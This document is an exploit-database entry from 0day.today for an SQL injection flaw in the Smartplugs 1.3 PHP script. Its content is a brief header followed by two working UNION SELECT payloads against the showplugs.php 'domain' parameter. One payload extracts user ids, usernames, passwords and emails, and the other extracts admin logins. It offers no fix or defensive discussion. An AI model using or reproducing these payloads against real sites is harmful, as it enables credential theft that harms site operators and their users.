Smartplugs 1.3 (showplugs.php) SQL Injection Vulnerability

2010-03-03T00:00:00
ID 1337DAY-ID-11159
Type zdt
Reporter Easy Laster
Modified 2010-03-03T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==========================================================
Smartplugs 1.3 (showplugs.php) SQL Injection Vulnerability
==========================================================

----------------------------Information------------------------------------------------
+Name : smartplugs 1.3 SQL Injection showplugs.php
+Autor : Easy Laster
+Date   : 03.03.2010
+Script  : smartplugs 1.3  http://www.smart-plugs.com/spv1/
+Download : -------------
+Price : 170$
+Language : PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/smartplugs/showplugs.php?domain=
 
+Exploitable users  : www.site.com/smartplugs/showplugs.php?domain=-9999999999'+union+select
+1,concat(id,0x3a,username,0x3a,password,0x3a,email),3,4,5,6+from+user--+
 
Exploitable admin : www.site.com/smartplugs/showplugs.php?domain=-9999999999'+union+
select+1,concat(username,0x3a,password),3,4,5,6+from+logins--+
-----------------------------------------------------------------------------------------



#  0day.today [2018-02-18]  #